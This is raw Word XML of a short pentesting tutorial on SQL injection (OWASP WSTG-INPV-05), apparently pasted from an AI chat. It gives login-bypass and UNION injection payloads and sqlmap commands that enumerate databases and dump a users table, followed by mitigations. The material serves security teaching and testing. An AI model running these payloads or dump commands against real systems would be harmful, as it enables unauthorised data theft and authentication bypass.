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584D" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">Perfect </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👌</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> now we move to </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WSTG-INPV-05 / SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> testing with </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC15D2A" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="5B340112">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FC9E7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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing for SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D91A539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🔎</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> What is SQLi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C2A64" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">SQL Injection happens when </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unsanitized user input is directly used in SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172F805" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">Attackers manipulate queries to </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>retrieve, modify, or delete data</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t>, bypass authentication, or gain system access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A1D2C7" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="751A0519">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="651FD28A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⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCE575" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055B6D82" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:t>https://example.com/login?user=admin&amp;pass=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84C9F4" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Malicious request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444522F" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:t>https://example.com/login?user=admin'--&amp;pass=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11A5ED" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>Query becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C172834" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:t>SELECT * FROM users WHERE username='admin'--' AND password='123</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B7252">
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F6E01B9" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>-- comments out the password check → login bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44DDD6" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="02429010">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF4D75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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing with sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B5EF0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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Basic GET request test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D860A6E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t>sqlmap -u "http://example.com/page.php?id=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B17B7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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9CE0E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t>sqlmap -u "http://example.com/login.php" --data="user=admin&amp;pass=123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C2AB42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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2230B0FC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t>sqlmap -u "http://example.com/profile.php?id=2" --cookie="PHPSESSID=xyz123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41027B41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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerating database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F3FF0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t>sqlmap -u "http://example.com/page.php?id=1" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70848D10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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dumping data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28248577" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap -u "http://example.com/page.php?id=1" -D testdb -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20FA61" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> sqlmap is powerful because it automates detection, fingerprinting DBMS, and exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38320E0A" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="4E9D7294">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73517550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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing with Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E7C8B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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intercept Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CCAB5A" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>Enable Burp Proxy &amp; capture request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D660C7" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">Send request to </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Repeater</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B9E45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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inject SQL Payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:br/>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0366B9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t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88C71B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t>admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B5968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t xml:space="preserve">test' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B7252">
        <w:t>null,null</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B7252">
        <w:t>,null--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1DBB2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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observe Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084631AE" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>Different error messages (e.g., MySQL error, ODBC SQL error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC96FD" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>Behavioral changes (auth bypass, extra data returned).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6912EC" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C07A540" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLiPy</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLMap Burp Plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> → directly send captured requests from Burp to </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B66F5" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="09417D86">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989B59F" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73096ED3" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parameterized Queries (Prepared Statements)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> – never concatenate user input into SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED7B3B" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ORMs</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> or stored procedures safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D5388" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>Principle of least privilege → DB users should have minimal rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A8516" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t>Error handling → do not expose raw SQL errors to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0806B" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="30793B6C">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B8A7F" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D0D1E" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> → automated &amp; powerful, great for exploitation and database enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536D0FCA" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> → manual, good for discovery, observing responses, and refining injection payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0394B2" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve">Best practice = </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use Burp for discovery, then sqlmap for exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C421D" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:pict w14:anchorId="35E96B7D">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52311705" w14:textId="77777777" w:rsidR="000B7252" w:rsidRPr="000B7252" w:rsidRDefault="000B7252" w:rsidP="000B7252">
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> Do you want me to also prepare a </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>step-by-step SQL Injection attack lab flow</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t xml:space="preserve"> (Burp → sqlmap → DB extraction) that mirrors how it’s done in </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real penetration testing reports</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7252">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F72D7" w14:textId="77777777" w:rsidR="0000111E" w:rsidRPr="000B7252" w:rsidRDefault="0000111E" w:rsidP="000B7252"/>
    <w:sectPr w:rsidR="0000111E" w:rsidRPr="000B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5F2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AB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61ED0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A38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C203A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="252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90F36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="940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42C29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB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D7ADB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEA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26333"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC28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728259">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1781148509">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1680040968">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1990942324">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="395783935">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="66389817">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="96084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6"/>
    <w:rsid w:val="0000111E"/>
    <w:rsid w:val="000B7252"/>
    <w:rsid w:val="005E4A76"/>
    <w:rsid w:val="00651926"/>
    <w:rsid w:val="0072345A"/>
    <w:rsid w:val="0097592E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F1F3B-20F4-4CAE-A861-51AB59EE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2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2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2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2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2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2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5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2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5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2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5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2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1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2025-08-17T19:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-17T19:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>